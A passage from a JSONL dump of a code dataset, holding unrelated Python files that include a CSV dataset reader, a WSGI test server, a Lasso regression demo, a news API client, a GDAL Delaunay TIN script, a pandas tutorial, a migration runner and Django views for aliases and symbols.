\"CUDA not available\")\n def test_ddpg_trainer_all_gpus(self):\n self._test_ddpg_trainer(use_gpu=True, use_all_avail_gpus=True)\n","sub_path":"ml/rl/test/gridworld/test_gridworld_ddpg.py","file_name":"test_gridworld_ddpg.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"193505543","text":"# ask the user for a string and print out whether the string is palindrome or not\n\nuserString = input(\"Please enter a word or phrase: \")\n\nstringForwards = []\n\n\nfor x in userString:\n\tstringForwards.append(x)\n\nstringBackwards = stringForwards[::-1]\n\nif stringForwards == stringBackwards:\n\tprint(\"That word is a palindrome\")\nelse:\n\tprint(\"That word is not a palindrome\")\n","sub_path":"Beginner-Python/One hit wonders/stringlists.py","file_name":"stringlists.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"69758578","text":"from typing import List, Iterable, Dict, Set, Callable\nfrom os import sep, system\nfrom functools import partial\nimport logging\nimport csv\n\n\nclass Row:\n '''\n Class Row represents one row in a dataset and\n is capable of getting data in specific type.\n\n For getting data from a column use one of the\n get methods.\n\n Parameters\n ----------\n mapping : Dict[str, int]\n Mapping between column names and theirs indexes.\n row : List[str]\n List of string data from a dataset\n (e.g. data retrieved from csv file).\n '''\n\n def __init__(self, mapping: Dict[str, int], row: List[str]):\n self._mapping = mapping\n self._row = row\n\n def get_raw_row(self) -> List[str]:\n return self._row\n\n def get_int_by_column(self, column: str) -> int:\n if column in self._mapping:\n return int(self._row[self._mapping[column]])\n else:\n raise KeyError(\"Column does not exist!\")\n\n def get_int_by_index(self, index: int) -> int:\n if index < len(self._row):\n return int(self._row[index])\n else:\n raise IndexError(\"Column does not exist!\")\n\n def get_float_by_column(self, column: str) -> float:\n if column in self._mapping:\n return float(self._row[self._mapping[column]])\n else:\n raise KeyError(\"Column does not exist!\")\n\n def get_float_by_index(self, index: int) -> float:\n if index < len(self._row):\n return float(self._row[index])\n else:\n raise IndexError(\"Column does not exist!\")\n\n def get_str_by_column(self, column: str) -> str:\n if column in self._mapping:\n return str(self._row[self._mapping[column]])\n else:\n raise KeyError(\"Column does not exist!\")\n\n def get_str_by_index(self, index: int) -> str:\n if index < len(self._row):\n return str(self._row[index])\n else:\n raise IndexError(\"Column does not exist!\")\n\n\nclass Dataset:\n '''\n Class Dataset represents a dataset and provides\n possibility to iterate over the dataset, so user\n does not have to care about reading from files.\n\n During a dataset creation it checks header of files\n and if some header is different then the others, it\n raises ValueError.\n\n To iterate over the dataset use one of the methods:\n - raw_data_without_header(self) -> Callable[[], Iterable[Row]]\n - provides one Iterable[Row]\n - raw_data_without_header_parallel(self, workers: int) -> List[Callable[[], Iterable[Row]]]\n - provides more Iterable[Row] based on the parameter workers\n - provides possibility to read a dataset in parallel\n\n Parameters\n ----------\n path_to_data : str\n A path to the directory where CSV files are stored.\n files_names : List[str]\n List of CSV files which should be included in the dataset.\n delimiter : str\n A delimiter for CSV files. 
Default value is comma \",\".\n\n Raises\n ------\n ValueError\n If the CSV files do not have the same headers.\n\n '''\n\n _logger = logging.getLogger(\"Dataset\")\n\n def __init__(self, path_to_data: str, files_names: List[str], delimiter: str = \",\"):\n self._path_to_data = path_to_data\n self._files_names = files_names\n self._delimiter = delimiter\n self._header = self._get_header(delimiter)\n\n def _get_header(self, delimiter) -> Dict[str, int]:\n header = None\n multiple_headers = False\n\n for file_name in self._files_names:\n self._logger.info(\"Checking header of file: \" + file_name)\n with open(self._path_to_data + sep + file_name) as file:\n if header is None:\n header = file.readline()[:-1].split(delimiter)\n else:\n current_header = file.readline()[:-1].split(delimiter)\n if header != current_header:\n self._logger.error(\"Different header for one dataset! Header: \" + delimiter.join(current_header))\n multiple_headers = True\n\n if multiple_headers:\n self._logger.error(\"Multiple headers for one dataset!\")\n raise ValueError(\"Multiple headers for one dataset!\")\n elif header is None:\n return dict()\n else:\n result = dict()\n for i, column in enumerate(header):\n result.update([(column, i)])\n return result\n\n def _raw_data_without_header(self, files_names: List[str]) -> Iterable[Row]:\n for file_name in files_names:\n self._logger.info(\"Reading file: \" + file_name)\n with open(self._path_to_data + sep + file_name) as file:\n skip = True\n for row in csv.reader(file, delimiter=self._delimiter):\n if skip:\n skip = False\n else:\n yield Row(self._header, row)\n\n def get_header(self) -> Set[str]:\n return set(self._header.keys())\n\n def raw_data_without_header(self) -> Callable[[], Iterable[Row]]:\n return lambda: self._raw_data_without_header(self._files_names)\n\n def raw_data_without_header_parallel(self, workers: int) -> List[Callable[[], Iterable[Row]]]:\n partition_size = int(len(self._files_names) / workers)\n\n iterators = []\n for i in range(workers - 1):\n iterators.append(partial(self._raw_data_without_header, self._files_names[i * partition_size:(i + 1) * partition_size]))\n iterators.append(partial(self._raw_data_without_header, self._files_names[(workers - 1) * partition_size:]))\n\n return iterators\n\n\nif __name__ == \"__main__\":\n # list aws\n # system(\"aws s3 ls --no-sign-request --region eu-central-1 \\\"s3://cse-cic-ids2018/\\\" --recursive --human-readable --summarize\")\n\n # download dataset\n # system(\"aws s3 cp --no-sign-request --region eu-central-1 \\\"s3://cse-cic-ids2018/Processed Traffic Data for ML Algorithms\\\" ../data_csv/ --recursive\")\n pass\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
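+# Minimal usage sketch for the Dataset/Row classes above; the directory and
+# file names are hypothetical placeholders, not part of the original project.
+dataset = Dataset("../data_csv", ["part1.csv", "part2.csv"])
+read_all = dataset.raw_data_without_header()  # Callable[[], Iterable[Row]]
+for row in read_all():
+    print(row.get_str_by_index(0))
+# or split the files across two workers for parallel reading:
+readers = dataset.raw_data_without_header_parallel(workers=2)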
+{"seq_id":"281228517","text":"import socket\nfrom threading import Thread\n\nfrom wsgiref.simple_server import make_server\n\n\ndef choose_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('localhost', 0))\n port = s.getsockname()[1]\n s.close()\n return port\n\n\nclass TestServer(object):\n def __init__(self, handler):\n self._handler = handler\n\n def _handle_request(self, environ, start_response):\n return self._handler(environ, start_response)\n\n def __enter__(self):\n self.port = choose_port()\n self.address = 'http://localhost:%i/' % self.port\n\n self._server = make_server(\n 'localhost', self.port, self._handle_request\n )\n\n self._thread = Thread(target=self._server.serve_forever)\n self._thread.start()\n\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self._server.shutdown()\n self._thread.join()\n","sub_path":"pope_client/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"24572512","text":"# coding:utf-8\n# 罰則項付き回帰 (Lasso 回帰) のサンプルプログラム\n\nfrom sklearn.linear_model import Lasso\nimport numpy as np\nfrom sklearn.datasets import load_boston\nimport pylab as plt\nfrom mpltools import style\nstyle.use('ggplot')\n\nboston = load_boston()\nplt.scatter(boston.data[:, 5], boston.target)\n\nplt.xlabel('RM')\nplt.ylabel('House Price')\n\nx = boston.data[:, 5]\nxmin = x.min()\nxmax = x.max()\nx = np.array([[v, 1] for v in x])\ny = boston.target\n\n# 罰則項を用いない回帰. numPy で実装.\n(slope, bias), res, _, _ = np.linalg.lstsq(x, y)\nplt.plot([xmin, xmax], [slope * xmin + bias, slope * xmax + bias], ':', lw = 4)\n\nrmse = np.sqrt(res[0] / len(x))\nprint('Residual: {}'.format(rmse))\n\n# 罰則項を用いる回帰 (Lasso). scikit-learn で実装.\nlas = Lasso()\nlas.fit(x, y)\n\nprediction = np.array([las.predict(xi) for xi in x])\nerror = prediction - y\ntotal_error = np.dot(error, error)\nrmse_train = np.sqrt(total_error / len(prediction))\n# print('RMSE on training: {}'.format(rmse_train))\n\ny0 = las.predict([xmin, 1])\ny1 = las.predict([xmax, 1])\nplt.plot([xmin, xmax], [y0, y1], '-', lw = 4)\nplt.savefig('figure7_3.png', dpi = 150)\n\n","sub_path":"Chapter07_1/figure7_3.py","file_name":"figure7_3.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"53720668","text":"import urllib.request,json\nfrom .models import news\nfrom app import app\n\nNews = news.News\nSource = news.Source\n# global api_key,source_base_url,articles_base_url\napi_key = app.config['NEWS_API_KEY']\nsource_base_url = app.config['NEWS_SOURCES_BASE_URL']\nnews_base_url = app.config['NEWS_API_BASE_URL']\n\ndef get_sources(category):\n '''Function that gets json response to our url request'''\n get_sources_url = source_base_url.format(category,api_key)\n print(get_sources_url)\n with urllib.request.urlopen(get_sources_url) as url:\n get_sources_data = url.read()\n get_sources_response = json.loads(get_sources_data)\n\n source_results = None\n\n if get_sources_response['sources']:\n source_results_list = get_sources_response['sources']\n source_results = process_results(source_results_list)\n print(source_results)\n return source_results\n\ndef process_results(source_list):\n '''\n Function that processes the source result and transform to a list of objects\n Args:\n source_list: A list of dictionaries that contain news sources\n Returns:\n source_results: A list of source objects\n '''\n source_results = []\n for source_item in source_list:\n id = source_item.get('id')\n name = source_item.get('name')\n description = source_item.get('description')\n\n source_object = Source(id,name,description)\n source_results.append(source_object)\n\n return source_results\n\ndef get_news(id):\n '''Function thet gets the json response to our url request'''\n get_news_url = news_base_url.format(id)\n print(get_news_url)\n\n with urllib.request.urlopen(get_news_url) as url:\n get_news_data = url.read()\n get_news_response = json.loads(get_news_data)\n\n news_results = None\n\n if get_news_response['articles']:\n news_results_list = get_news_response['articles']\n news_results = process_articles(news_results_list)\n\n return news_results\n\ndef process_articles(news_list):\n '''\n Function that processes the news result and transforms them to a list of objects\n Args:\n news_list: a list of dictionaries that contain articles\n Returns:\n news_results: a list of news objects\n '''\n news_results = []\n for news_item in news_list:\n title = news_item.get('title')\n author= news_item.get('author')\n description = news_item.get('description')\n url = news_item.get('url')\n urlToImage = news_item.get('urlToImage')\n publishedAt = news_item.get('publishedAt')\n content = news_item.get('content')\n if urlToImage:\n news_object = News(title,author,description,url,urlToImage,publishedAt,content)\n news_results.append(news_object)\n\n return news_results\n\n# def process_articles(news_list):\n# # print(news_list)\n# '''\n# Function that processes the movie result and transform them to a list of Objects\n# Args:\n# news_list: A list of dictionaries that contain news details\n# Returns :\n# news_articles: A list of news objects\n# '''\n# news_articles = []\n# for news_item in news_list:\n# author=news_item.get('author')\n# title = news_item.get('title')\n# description= news_item.get('description')\n# url = news_item.get('url')\n# urlToImage = news_item.get('urlToImage')\n# publishedAt = news_item.get('publishedAt')\n# content= news_item.get('content')\n\n# news_object = News(author,title,description,url,urlToImage,publishedAt,content)\n# news_articles.append(news_object)\n \n# return news_articles\n\ndef search_news(news_id):\n search_news_url = 'https://newsapi.org/v2/everything?api_key={}&query={}'.format(api_key,news_id)\n \n with urllib.request.urlopen(search_news_url) as url:\n 
search_news_data = url.read()\n search_news_response = json.loads(search_news_data)\n\n search_news_articles = None\n\n if search_news_response['articles']:\n search_news_list = search_news_response['articles']\n search_news_articles = process_articles(search_news_list)\n\n\n return search_news_articles\n","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"75504654","text":"# -*- coding: utf-8 -*-\n# @StartTime : 2017/4/13 16:17\n# @EndTime : 2017/4/15 13:30\n# @Author : Andy\n# @File : Qizhong0413.py\n# @Software : PyCharm\n# 1. 请写一个程序,利用第二章的stations.shp点文件生成一个TIN三角网,并存为Shape文件。目的:巩固OGR矢量文件读写知识,自学scipy.spatial模块的Delaunay类。\n# 提交要求:Python源码、Matplotlib生成的结果图片。\n\n\nfrom osgeo import ogr\nfrom osgeo import gdal\nimport numpy as np\nfrom scipy.spatial import Delaunay\nimport matplotlib.pyplot as plt\nimport os\nfrom gwp_shape import SHAPE\n\n# 读取文件\n\n# 为了支持中文路径,请添加下面这句代码\ngdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n# 为了使属性表字段支持中文,请添加下面这句\ngdal.SetConfigOption(\"SHAPE_ENCODING\", \"\")\n# 注册所有的驱动\nogr.RegisterAll()\n\nfilename=\"stations.shp\"\nds=ogr.Open(filename,False)\nlayer=ds.GetLayer(0)\n\nspatialref=layer.GetSpatialRef()\n# print spatialref\nlydefn=layer.GetLayerDefn()\ngeomtype=lydefn.GetGeomType()\n# print geomtype\n\nfieldlist = [] #字段列表 (字段类型,OFTInteger, OFTReal, OFTString, OFTDateTime)\nfor i in range(lydefn.GetFieldCount()):\n fddefn = lydefn.GetFieldDefn(i)\n fddict = {'name':fddefn.GetName(),'type':fddefn.GetType(),\n 'width':fddefn.GetWidth(),'decimal':fddefn.GetPrecision()}\n fieldlist += [fddict]\n# print fieldlist\n\ngeomlist, reclist = [], [] #SF 数据记录 – 几何对象及其对应属性\nfeature = layer.GetNextFeature() #获得第一个 SF\nwhile feature is not None:\n geom = feature.GetGeometryRef()\n geomlist += [geom.ExportToWkt()]\n rec = {}\n for fd in fieldlist:\n rec[fd['name']] = feature.GetField(fd['name'])\n reclist += [rec]\n feature = layer.GetNextFeature()\n# print geomlist\n# print \"cut\"\n# print reclist\n\npoints = np.zeros((len(geomlist),2),dtype=np.float)\nfor i in range(len(reclist)): #将 SF 数据记录(几何对象及其属性写入图层)\n geom = ogr.CreateGeometryFromWkt(geomlist[i])\n points[i,0],points[i,1] = geom.GetX(),geom.GetY()\nds.Destroy()\n# print points.shape\n\n# 生成TIN\n\ntri = Delaunay(points)\ndelaunay=tri.simplices.copy() #各三角形索引 0-174\n\nplt.triplot(points[:, 0], points[:, 1], tri.simplices.copy()) # 绘制三角格网\nplt.plot(points[:, 0], points[:, 1], 'o') # 绘制这些离散点\nplt.xlim(00000, 1000000)\nplt.ylim(00000, 1000000)\nplt.show()\n\n\n# 写入points,形式Polygon\noutputfile=\"TIN_stations.shp\"\nshape_driver=SHAPE()\ngeomtypeo=ogr.wkbPolygon\nfieldlisto_ = [{'width': 20, 'decimal': 0, 'type': ogr.OFTInteger, 'name': 'ID'},\n {'width': 20, 'decimal': 3, 'type': ogr.OFTReal, 'name': 'AREA'},\n {'width': 20, 'decimal': 3, 'type': ogr.OFTReal, 'name': 'ANN_PREC'}\n ]\ngeomlist_,reclist_=[],[]\n# print 'cut3'\nfor i in range(len(delaunay)):\n if len(delaunay[i])==0:\n continue\n if -1 in delaunay[i]:\n continue\n coords=[]\n for j in delaunay[i]:\n x,y=points[j,0],points[j,1]\n coords.append(\"%f %f\"%(x,y))\n coords.append(\"%f %f\"%(points[delaunay[i][0],0],points[delaunay[i][0],1]))\n wkt_ = \"POLYGON ((%s))\"%(','.join(coords))\n rec_={}\n rec_['ID']=i\n rec_['AREA']=ogr.CreateGeometryFromWkt(wkt_).GetArea()\n rec_['ANN_PREC']=0.0\n geomlist_.append(wkt_)\n reclist_.append(rec_)\n# print reclist_\n# print geomlist_\nshape_driver.write_shp(outputfile,spatialref,geomtypeo,geomlist_,fieldlisto_,reclist_)\n","sub_path":"PythonGIS/Python空间数据处理期中作业/Qizhong0413.py","file_name":"Qizhong0413.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"487074272","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport time\nlopp = 0\n# Open the camera\ncap = cv2.VideoCapture(0)\nwhile True:\n # Read the image from the camera\n algus = time.time()\n kulunud_aeg = algus - lopp\n fps = 1 / kulunud_aeg\n lopp = algus\n \n ret, frame = cap.read()\n \n # Write some text onto the frame\n \n\n # Show this image on a window named \"Original\"\n\n \n\n \n cv2.putText(frame, str(int(fps)), (5, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\n cv2.imshow('Original', frame)# Quit the program when 'q' is pressed\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\nprint('closing program')\ncap.release()\ncv2.destroyAllWindows()\n\n","sub_path":"lab05/raske2.py","file_name":"raske2.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"589405782","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/bee/Dev/piu/django/testSite/bee_django_mission/management/commands/init_mission_type.py\n# Compiled at: 2018-06-05 02:54:47\n__author__ = 'zhangyue'\nimport os, datetime, urllib2, json\nfrom django.core.management.base import BaseCommand, CommandError\nfrom bee_django_mission.models import ContentType, MissionType, Line, Stage\n\nclass MissionTypeData:\n mission_type_list = [\n {'id': 0, \n 'name': '直播时长', \n 'field_name': 'duration', \n 'conditions': 'status:1', \n 'aggragate_type': 2, \n 'comparison_type': 1, \n 'timestamp_field': 'start_time', \n 'operator_type': 1, \n 'link_url': '/custom_course/user_live/', \n 'link_name': '去直播'},\n {'id': 1, \n 'name': '转介人数', \n 'field_name': 'id', \n 'conditions': 'level:3', \n 'aggragate_type': 1, \n 'comparison_type': 1, \n 'timestamp_field': 'created_at', \n 'operator_type': 0, \n 'link_url': '', \n 'link_name': ''},\n {'id': 2, \n 'name': '考级通过', \n 'field_name': 'id', \n 'conditions': 'status:1', \n 'aggragate_type': 1, \n 'comparison_type': 1, \n 'timestamp_field': None, \n 'operator_type': 0, \n 'link_url': '', \n 'link_name': ''},\n {'id': 3, \n 'name': '直播天数', \n 'field_name': 'start_time', \n 'conditions': 'status:1', \n 'aggragate_type': 3, \n 'comparison_type': 1, \n 'timestamp_field': 'start_time', \n 'operator_type': 0, \n 'link_url': '/custom_course/user_live/', \n 'link_name': '去直播'},\n {'id': 4, \n 'name': '完成课程课件', \n 'field_name': 'id', \n 'conditions': 'finished_at__isnull:False', \n 'aggragate_type': 1, \n 'comparison_type': 1, \n 'timestamp_field': None, \n 'operator_type': 0, \n 'link_url': '/course/user_course/', \n 'link_name': '去学习'}]\n content_type_list = [\n {'app_label': 'bee_django_course', \n 'model': 'UserLive', \n 'user_field': 'user', \n 'info': '课程-习琴记录表', \n 'mission_list': [\n mission_type_list[0], mission_type_list[3]]},\n {'app_label': 'bee_django_crm', \n 'model': 'PreUser', \n 'user_field': 'referral_user', \n 'info': 'crm-转介记录表', \n 'mission_list': [\n mission_type_list[1]]},\n {'app_label': 'bee_django_exam', \n 'model': 'UserExamRecord', \n 'user_field': 'user', \n 'info': '考级-考级记录表', \n 'mission_list': [\n mission_type_list[2]]},\n {'app_label': 'bee_django_course', \n 'model': 'UserCourseSection', \n 'user_field': 'user_course__user', \n 'info': '课程-学生学习课件表', \n 'mission_list': [\n mission_type_list[4]]}]\n\n\nclass lineDate:\n line_list = [\n {'name': '里程碑', 'line_type': 1, \n 'auto_finish': 0, \n 'auto_start': 1},\n {'name': '周任务', 'line_type': 2, \n 'auto_finish': 1, \n 'auto_start': 0}]\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n self.init_mission_type()\n self.init_line()\n self.init_stage()\n\n def init_line(self):\n line_list = lineDate.line_list\n for line in line_list:\n self.save_line(line)\n\n def save_line(self, line):\n name = line['name']\n line_type = line['line_type']\n auto_finish = line['auto_finish']\n auto_start = line['auto_start']\n try:\n l = Line.objects.get(name=name)\n except:\n l = Line()\n l.name = name\n l.line_type = line_type\n l.auto_finish = auto_finish\n l.auto_start = auto_start\n l.save()\n\n return l\n\n def init_stage(self):\n stage_name = '本周任务'\n try:\n l = Line.objects.get(line_type=2)\n except:\n return\n\n try:\n Stage.objects.get(name=stage_name)\n return\n except:\n pass\n\n stage = Stage()\n stage.name = stage_name\n stage.level = 
1\n stage.line = l\n stage.save()\n return stage\n\n def init_mission_type(self):\n content_type_list = MissionTypeData.content_type_list\n for content_type in content_type_list:\n ct = self.save_content_type(content_type)\n mission_list = content_type['mission_list']\n for mission_type in mission_list:\n self.save_mission_type(mission_type, ct)\n\n def save_content_type(self, content_type):\n app_label = content_type['app_label']\n model = content_type['model']\n user_field = content_type['user_field']\n info = content_type['info']\n try:\n ct = ContentType.objects.get(app_label=app_label, model=model)\n except:\n ct = ContentType()\n ct.app_label = app_label\n ct.model = model\n ct.user_field = user_field\n ct.info = info\n ct.save()\n\n return ct\n\n def save_mission_type(self, mission_type, ct):\n name = mission_type['name']\n field_name = mission_type['field_name']\n conditions = mission_type['conditions']\n aggregate_type = mission_type['aggragate_type']\n comparison_type = mission_type['comparison_type']\n timestamp_field = mission_type['timestamp_field']\n operator_type = mission_type['operator_type']\n link_url = mission_type['link_url']\n link_name = mission_type['link_name']\n try:\n mt = MissionType.objects.get(name=name)\n except:\n mt = MissionType()\n\n mt.name = name\n mt.field_name = field_name\n mt.conditions = conditions\n mt.aggregate_type = aggregate_type\n mt.comparison_type = comparison_type\n mt.timestamp_field = timestamp_field\n mt.operator_type = operator_type\n mt.content_type = ct\n mt.link_name = link_name\n mt.link_url = link_url\n mt.save()\n return mt","sub_path":"pycfiles/bee-django-mission-0.1.12.tar/init_mission_type.py","file_name":"init_mission_type.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"154605921","text":"from datetime import datetime\nfrom rsm_lib.database.common import Session\nfrom rsm_lib.database.models import MIGRATION_STATES\nfrom sqlalchemy.exc import OperationalError, ProgrammingError\nfrom rsm_lib.common import logger\nfrom rsm_lib.migration_lib.migration_parser import MigrationParser, MigrationSteps\n\n\nclass MigrationRunner:\n modes = ['up', 'down']\n\n def __init__(self, migration):\n self.db_session = Session()\n self.migration = migration\n\n def run(self, mode):\n\n # validate that we have passed a proper mode of operation\n if mode not in self.modes:\n raise ValueError(f'mode must be set to either up or down, not {mode}')\n\n parser = MigrationParser(self.migration.file_name)\n parsed_migration = parser.get_parsed_migration_from_file()\n\n base_path = parser.migration_path / mode\n steps = None\n\n if mode == 'up':\n steps = MigrationSteps(parsed_migration.up_steps)\n\n if mode == 'down':\n steps = MigrationSteps(parsed_migration.down_steps)\n\n steps_executed = []\n exception = ''\n\n for step in steps:\n\n search_path = base_path / step\n sql = search_path.read_text()\n\n try:\n logger.info(f\"running command {sql}\")\n\n self.db_session.execute(sql)\n self.db_session.commit()\n steps_executed.append(step)\n\n except OperationalError as e:\n logger.exception('An Operational Exception has occurred. Check logs.')\n self.db_session.rollback()\n exception = str(e)\n break\n\n except ProgrammingError as e:\n logger.exception('A programming error has occurred. Check logs.')\n self.db_session.rollback()\n exception = str(e)\n break\n\n self.migration.exception = exception\n self.migration.last_run_at = datetime.now()\n self.migration.steps_executed = str(steps_executed)\n\n if exception:\n\n if mode == 'up':\n self.migration.state = MIGRATION_STATES.applied_up_fail.value\n self.migration.state_name = MIGRATION_STATES.applied_up_fail.name\n\n if mode == 'down':\n self.migration.state = MIGRATION_STATES.applied_down_fail.value\n self.migration.state_name = MIGRATION_STATES.applied_down_fail.name\n\n else: # otherwise success\n\n if mode == 'up':\n self.migration.state = MIGRATION_STATES.applied_up_success.value\n self.migration.state_name = MIGRATION_STATES.applied_up_success.name\n\n if mode == 'down':\n self.migration.state = MIGRATION_STATES.applied_down_success.value\n self.migration.state_name = MIGRATION_STATES.applied_down_success.name\n\n self.db_session.add(self.migration)\n self.db_session.commit()\n\n\ndef run_migration_up(migration):\n runner = MigrationRunner(migration)\n runner.run('up')\n\n\ndef run_migration_down(migration):\n runner = MigrationRunner(migration)\n runner.run('down')\n","sub_path":"rsm_lib/migration_lib/migration_runner.py","file_name":"migration_runner.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"384163378","text":"import pandas as pd\r\n\r\n\r\n\r\n##LIST OF OPERATIONS(only few impotant once are mentioned, rest all google= 'pandas series operations')\r\n##1.creating a dataframe\r\n##2.opening a pre existing csv file\r\n##3.rows and columns\r\n##4.selectively printing rows and columns\r\n##5.data type of columns\r\n##6.MAX and MIN\r\n##7.MEAN\r\n##8.standard deviation\r\n##9.describe: gives all the stats like count,max,min,mean,std....\r\n##10.conditions\r\n###11.to set index(nos: 0,1,2,3..)\r\n##12.to get a particular row on the basis of the new index\r\n##13.filling Nan\r\n\r\n\r\n\r\n\r\n#1.create dataframe\r\nwether_data={\r\n 'day': ['1/1/2017','1/2/2017','1/3/2017'],\r\n 'temperature': [32,34,26],\r\n 'windspeed': [3,4,7],\r\n 'event': ['Rain','sunny','snow']\r\n }\r\ndf=pd.DataFrame(wether_data)#convert this to a pandas dataframe\r\n#print(df)\r\n\r\n#2.opening a pre existing csv file\r\ndf1=pd.read_csv('nyc_weather.csv')\r\n\r\n#3.rows and columns\r\nrows,columns=df1.shape\r\n#print(rows,columns)\r\n\r\n#4.if we want to print only first n rows do df.head(n)\r\n#print(df1.head(4))\r\n\r\n#4.if we want to print only last n rows do df.tail(n)\r\n#print(df1.tail(4))\r\n\r\n#4.to print few selective rows\r\n#print(df1[2:5])#prints 2,3,4\r\n\r\n#4.to print the name of all the columns\r\n#print(df.columns)\r\n\r\n#4.to print a particular column\r\n#print(df.day)# or also df['day'] but ['wind speed'] if spaces are there then we have to use only this type\r\n\r\n#4.to print selective columns\r\n#print(df[['event','day','temperature']])\r\n\r\n#5.ype of columns\r\n#print(type(df['event']))# it is always SERIES\r\n\r\n#6.MAX and MIN\r\n#print(df['temperature'].min())\r\n\r\n#7.MEAN\r\n#print(df['temperature'].mean())\r\n\r\n#8.standard deviation\r\n#print(df['temperature'].std())\r\n\r\n#9.describe\r\n#print((df.describe())\r\n\r\n\r\n#10.conditionally select data\r\n#print(df[df['temperature']>=32])\r\n#print(df[df['temperature']==df.temperature.max()])\r\n\r\n#11.to set index(nos: 0,1,2,3..)\r\n#print(df.index)#prints range\r\n\r\n#print(df.set_index('day'))#column day becomes the index instead of 0,1,2,3..\r\n\r\n#to permanently change the index\r\n#df.set_index('day',inplace=True)\r\n#print(df)\r\n\r\n#12.to get a particular row on the basis of the new index\r\n#print(df.loc['1/1/2017'])\r\n\r\n#to reset index\r\n#df.reset_index(inplace=True)\r\n#print(df)\r\n\r\n#13.filling Nan\r\n#there is a problem with any given data set if it has a unfilled data points.\r\n#it showa Nan, so here Nan doesnt mean =0 but takes some junk value because of which value of AVG comes wrong\r\n#so in order to make all the Nan spaces as 0 do the following\r\ndf1.fillna(0,inplace=True)\r\nprint(df1)#here Nan is replaced by 0\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"pandas prog/1. operations on dataframe.py","file_name":"1. operations on dataframe.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"227221359","text":"from django.http import HttpResponse\nfrom django.template import loader\nfrom . models import TheAlias,TheSymbol,AliasRedo,SymbolRedo\nfrom datetime import datetime\nfrom transfer.models import TheNotes\nfrom transfer.models import Symbols\n\ndef aliasPage(request):\n globalId = request.session['globalId']\n #fetch the exisiting alias,\n # a) yes ->display\n # b) no -> check whether it is in pending approval,\n # in context it would be alias + status\n aliasRes = TheAlias.objects.filter(globalId=globalId)\n if aliasRes:\n template = loader.get_template('theAlias/aliasResult.html')\n #if there is a alias inplace, list all the symbols that have the note which could be manipulated by this alias, excluding the symbol associated with this alias\n #select symbol, owner from ownership0 where owner='jungu002' and symbol not in (select symbol from issuer0 where alias='jungu002');\n alias = aliasRes[0].alias\n symbols = Symbols.objects.raw(\"\"\"\n select symbol,min(id) as id from ownership0 where owner=%s and symbol not in (select symbol from issuer0 where alias=%s) group by symbol\n \"\"\",[alias, alias])\n context = {\n 'alias': alias,\n 'status': 0 ,\n 'symbols': symbols,\n }\n\n if not aliasRes:\n redoCount = len(AliasRedo.objects.filter(globalId=globalId))\n if redoCount == 1:\n template = loader.get_template('theAlias/aliasResult.html')\n context = {\n 'alias': AliasRedo.objects.filter(globalId=globalId)[0].alias,\n 'status': 1,\n 'symbols': [],\n }\n \n if redoCount == 0:\n template = loader.get_template('theAlias/alias.html')\n context = {\n }\n resp = HttpResponse(template.render(context,request))\n resp.set_cookie('aliaspostToken',value='01')\n return resp\n return HttpResponse(template.render(context,request))\n\n##def applyAlias(request):\n## if request.COOKIES['aliaspostToken'] == '01':\n## template = loader.get_template('theAlias/aliasResult.html')\n## globalId = request.session[\"globalId\"]\n## theAlias = AliasRedo(alias=request.POST[\"alias\"], progress=1, setup=datetime.now(), globalId=globalId)\n## theAlias.save()\n## context = {\n## 'alias': theAlias.alias,\n## 'status': 1,\n## 'symbols': [],\n## }\n## resp = HttpResponse(template.render(context, request))\n## resp.set_cookie('aliaspostToken',value='00')\n## return resp\n## return HttpResponse(\"Can't Submit Twice\")\n\n\ndef symbolPage(request):\n globalId = request.session[\"globalId\"]\n count = len(TheSymbol.objects.filter(globalId=globalId))\n if count == 1:\n symbol = TheSymbol.objects.filter(globalId=globalId)[0].symbol\n #load the notes (issued AND NOT transfered)\n notes = TheNotes.objects.raw(\"\"\"select o.id, o.\"noteId\", o.quantity, i.\"globalId\" from issuer0 i, ownership0 o where o.symbol = i.symbol and o.owner = i.alias and i.\"globalId\" = %s\"\"\",[globalId])\n \n context = {\n 'symbol': symbol,\n 'status': 0,\n 'notes': notes,\n }\n template = 